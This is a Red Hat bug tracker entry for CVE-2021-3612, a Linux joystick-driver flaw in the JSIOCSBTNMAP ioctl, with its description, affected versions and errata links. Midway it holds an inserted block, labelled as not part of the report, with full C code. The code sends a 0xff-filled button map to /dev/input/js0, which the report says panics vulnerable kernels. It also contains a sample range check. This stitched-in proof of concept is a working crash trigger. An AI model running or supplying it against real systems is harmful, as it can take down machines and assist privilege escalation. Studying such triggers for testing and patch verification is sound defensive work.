Bug 1974079 (CVE-2021-3612)

Summary: CVE-2021-3612 kernel: joydev: zero size passed to joydev_handle_JSIOCSBTNMAP()
Product: [Other] Security Response
Reporter: Alex <allarkin>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
QA Contact:
Severity: medium
Docs Contact:
Priority: medium
Version: unspecified
CC: acaringi, adscvr, airlied, alciregi, bhu, blc, brdeoliv, bskeggs, chwhite, crwood, dhoward, dvlasenk, fhrbata, fpacheco, hdegoede, hkrzesin, jarod, jarodwilson, jeremy, jforbes, jlelli, jonathan, josef, jshortt, jstancek, jwboyer, kcarcia, kernel-maint, kernel-mgr, lgoncalv, linville, masami256, mchehab, mlangsdo, nmurray, ptalbert, qzhao, rvrbovsk, steved, walters, wcosta, williams
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version: kernel 5.9-rc1
Doc Type: If docs needed, set a value
Doc Text:
An out-of-bounds memory write flaw was found in the Linux kernel’s joystick devices subsystem, in the way the user calls ioctl JSIOCSBTNMAP. This flaw allows a local user to crash the system or possibly escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
Story Points: ---
Clone Of:
Environment:
Last Closed: 2022-05-11 07:15:33 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 1974723, 1974724, 1974726, 1974727, 1974080, 1974087, 1974088, 1974089, 1974090, 1974091, 1974102
Bug Blocks: 1966365, 1974465

Description Alex 2021-06-20 12:44:00 UTC
If using the ioctl JSIOCSBTNMAP (e.g. on device /dev/input/js0) with incorrect input data (e.g. a buffer filled with 0xff values), then a Linux kernel module crash (panic) happens, with memory being written out of bounds.
The bug exists in kernels after patch 182d679b2298 (ref. https://lore.kernel.org/linux-input/20210219083215.GS2087@kadam/ , so starting from upstream v5.12-rc1). Before this patch (before v5.12-rc1), the bug existed too, but there was only the possibility of reading out of the stack, which was less dangerous.

Comment 1 Alex 2021-06-20 12:44:57 UTC
Created kernel tracking bugs for this issue:

Affects: fedora-all [bug 1974080]

Comment 2 Alex 2021-06-20 13:23:58 UTC
Since the patch
https://lore.kernel.org/linux-input/20210219083215.GS2087@kadam/
has not yet been applied to any version of Red Hat Enterprise Linux, for all versions of Red Hat Enterprise Linux only an out-of-bounds memory read is possible (and in both cases it usually requires some privileges, because the CONFIG_INPUT_JOYDEV module is not used by default, so there are no devices like /dev/input/js*, and as a result it is not possible to trigger the bug before enabling the device driver).
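
The ioctl exchange that the description and Comment 2 refer to, as an added example that is not part of this bug report or of the kernel's own code: it builds the JSIOCSBTNMAP request the reporter describes (a button map filled with 0xff bytes), shows how far outside the per-device keymap such an entry would index, applies the range check that a map must pass before it is used as an index, and sends the request only if a joystick node exists (Comment 2 notes there is none unless CONFIG_INPUT_JOYDEV is in use). The names validate_btnmap(), btnmap_slot(), fill_bad_map() and send_btnmap(), the BTNMAP_SLOTS macro and the /dev/input/js0 path are this example's own assumptions, and the check is an illustrative user-space reimplementation, not the kernel's code.

```c
/* Added example for CVE-2021-3612; not code from the bug report or the kernel.
 * Builds the JSIOCSBTNMAP request described in the report (map filled with
 * 0xff), shows why it is out of range, and only touches a device if one exists
 * so the block also runs on a host without joydev. */
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/joystick.h>          /* JSIOCSBTNMAP */
#include <linux/input-event-codes.h> /* BTN_MISC, KEY_MAX */

/* One keymap slot per button code from BTN_MISC..KEY_MAX (assumed layout). */
#define BTNMAP_SLOTS (KEY_MAX - BTN_MISC + 1)

/* Range check a user-supplied button map must pass before any entry is used
 * as an index into a keymap of BTNMAP_SLOTS entries.  `map` holds `len`
 * entries; the device has `nkey` buttons.  Returns 0 if the first nkey
 * entries are all within [BTN_MISC, KEY_MAX], else -EINVAL.  A map shorter
 * than nkey is rejected too: entries past len were never supplied by the
 * caller.  Illustrative reimplementation, not the kernel's check. */
int validate_btnmap(const uint16_t *map, size_t len, unsigned nkey)
{
    if (nkey > len || len > BTNMAP_SLOTS)
        return -EINVAL;
    for (unsigned i = 0; i < nkey; i++)
        if (map[i] < BTN_MISC || map[i] > KEY_MAX)
            return -EINVAL;
    return 0;
}

/* Keymap slot an entry selects if it is used unchecked (code - BTN_MISC);
 * anything >= BTNMAP_SLOTS is a write past the end of the keymap. */
long btnmap_slot(uint16_t code)
{
    return (long)code - BTN_MISC;
}

/* The 0xff pattern from the report: every __u16 entry becomes 0xffff. */
void fill_bad_map(uint16_t *map, size_t len)
{
    memset(map, 0xff, len * sizeof *map);
}

/* Issue JSIOCSBTNMAP against dev.  Returns 0 if the kernel accepted the map,
 * the positive errno it rejected it with, or -1 if dev could not be opened
 * (no joydev node on this host, or no permission). */
int send_btnmap(const char *dev, const uint16_t *map)
{
    int fd = open(dev, O_RDONLY);
    if (fd < 0)
        return -1;
    int rc = ioctl(fd, JSIOCSBTNMAP, map);
    int err = rc < 0 ? errno : 0;
    close(fd);
    return err;
}

int main(void)
{
    uint16_t map[BTNMAP_SLOTS];
    fill_bad_map(map, BTNMAP_SLOTS);
    printf("entry 0 = 0x%04x -> keymap slot %ld, but the keymap has %d slots\n",
           map[0], btnmap_slot(map[0]), (int)BTNMAP_SLOTS);
    printf("validate_btnmap on the 0xff map: %d (-EINVAL is %d)\n",
           validate_btnmap(map, BTNMAP_SLOTS, 16), -EINVAL);
    int rc = send_btnmap("/dev/input/js0", map);
    if (rc < 0)
        puts("no /dev/input/js0 (joydev not in use): ioctl not attempted");
    else
        printf("kernel returned %d (%s)\n", rc, rc ? strerror(rc) : "accepted");
    return 0;
}
```

Only run this on a throwaway test VM with a joystick node present: on a kernel between v5.12-rc1 and the fix, the report says this ioctl panics the machine, while a kernel that range-checks every entry returns EINVAL for this map. The "zero size" in the bug title refers to the length handed to joydev_handle_JSIOCSBTNMAP(); with the JSIOCSBTNMAP macro that length is the full table, so this request exercises the value check, not the zero-length path.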

Comment 11 errata-xmlrpc 2022-05-10 14:39:03 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1975 https://access.redhat.com/errata/RHSA-2022:1975

Comment 12 errata-xmlrpc 2022-05-10 14:44:44 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1988 https://access.redhat.com/errata/RHSA-2022:1988

Comment 13 Product Security DevOps Team 2022-05-11 07:15:29 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-3612